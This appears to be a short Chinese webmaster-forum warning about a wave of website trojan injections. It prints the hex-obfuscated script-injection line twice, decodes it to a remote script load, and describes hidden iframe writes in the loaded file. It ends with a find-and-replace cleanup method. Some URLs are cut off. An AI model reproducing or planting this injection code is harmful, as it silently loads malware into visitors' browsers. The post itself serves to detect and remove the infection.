近日有多个网友的网页被挂马!
“<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>”
最新的木马
是十六进制的
把\x替换为%,然后用html代码转换功能,解码
<script src=;
在转换一次,解码
最终js 输出的是
<script src=;
faq.js里面是
document.write('<iframe src="; width="1" height="1" frameborder="1"></iframe>');
document.write('<iframe src="; width="1" height="2" frameborder="0"></iframe>');
下载下来发现了这么一串代码:<script language="javascript" src=";
木马的地址其中一个是51yes的
;
下载下来发现了这么一串代码<script src=addr.js></script><script language="javascript" type="text/javascript" src=";
为了防止大家中毒把http改成了https
暂时解决办法:
下载文本替换专家:
将网站中的代
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
换成 空
选择网站路径,替换,然后重新上专即可.
A5创业网 版权所有